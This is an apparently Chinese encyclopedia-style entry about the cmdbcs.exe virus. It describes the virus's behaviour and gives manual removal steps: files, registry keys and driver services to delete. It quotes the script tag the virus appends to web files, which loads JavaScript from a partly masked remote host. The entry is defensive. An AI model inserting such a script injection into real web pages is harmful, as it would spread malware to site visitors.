cmdbcs.exe

病毒檔案。

基本介紹

  • 外文名:cmdbcs.exe
  • 屬於:病毒檔案。
  • 步驟1:病毒運行後釋放如下副本以及檔案
  • 步驟2:釋放一個批處理停止Windows
最近電腦突然卡,發現進程了多了很多個cmdbcs.exe
感覺不對,馬上從收藏夾里找到線上防毒http://www.antidu.cn/board/online/ 查殺
果然,瑞星報毒!!!
1.病毒運行後,釋放如下副本以及檔案:
%systemroot%\system32\wxptdi.sys
2.釋放一個批處理停止Windows 防火牆服務
3.檢測進程中是否存在AVP.exe 如果存在則把時間改為2001年
4.啟動一個空殼的wuauclt.exe 把%systemroot%\system32\wxptdi.sys(其實和ntuser.com是同一個檔案)的代碼完全注入進去
5.感染全盤的php jsp asp htm html檔案 在後面寫入<script language=javascript src=http://cc.18d***.net/1.js></script>的代碼
6.wuauclt.exe執行下載木馬的操作
讀取http://*.com/elf_listo.txt的檔案列表
下載27個木馬和病毒 到c:\Program Files下面 分別命名為csrss0.exe~csrss9.exe csrssa.exe~csrsst.exe
清除辦法:
下載sreng:http://www.antidu.cn/board/helpst/
1.刪除:
%systemroot%\system32\drivers\msconkt.sys
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\DbgHlp32.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\LYLOADER.EXE
%systemroot%\system32\LYMANGR.DLL
%systemroot%\system32\MSDEG32.DLL
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\REGKEY.hiv
%systemroot%\system32\SSLDyn.dll
%systemroot%\system32\wxptdi.sys
%systemroot%\608769L.exe
%systemroot%\608769M.exe
%systemroot%\608769MM.DLL
%systemroot%\608769WL.DLL
%systemroot%\AVPSrv.exE
%systemroot%\cmdbcs.exe
%systemroot%\DbgHlp32.exe
%systemroot%\Kvsc3.exE
%systemroot%\NVDispDRV.EXE
%systemroot%\SSLDyn.exE
%systemroot%\system32\fat32.sys(%systemroot%為環境變數,表示你的系統資料夾安裝位置,對於系統盤安裝在C糟的XP用戶即為%systemroot% 以此類推)
2.重啟之後
打開sreng
啟動項目 註冊表 刪除如下項目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SSLDyn><%systemroot%\SSLDyn.exE> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<WinSysM><%systemroot%\608769M.exe> []
<WinSysW><%systemroot%\608769L.exe> []
<Kvsc3><%systemroot%\Kvsc3.exE> []
<AVPSrv><%systemroot%\AVPSrv.exE> []
<NVDispDrv><%systemroot%\aorwpw.exe> [N/A]
<DbgHlp32><%systemroot%\DbgHlp32.exe> []
在“啟動項目”-“服務”-“驅動程式”中點“隱藏經認證的微軟項目”,
選中以下項目,點“刪除服務”,再點“設定”,在彈出的框中點“否”:
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>(之前的comint32.sys變種)
[RAS Asynchronous Media Driver / CCDEcode][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
<\??\%systemroot%\system32\fat32.sys><N/A>(機器狗病毒變種)
3.清除機器狗病毒
參考http://www.antidu.cn/html/1/2007/12/antidu_20071217212429.html
解決方法第三點即可
4.清除GD*I32.dll,bj*rl.dll,addr*help.dll木馬群
參考http://www.antidu.cn/html/1/2007/12/antidu_20071210194454.html即可

相關詞條

熱門詞條

聯絡我們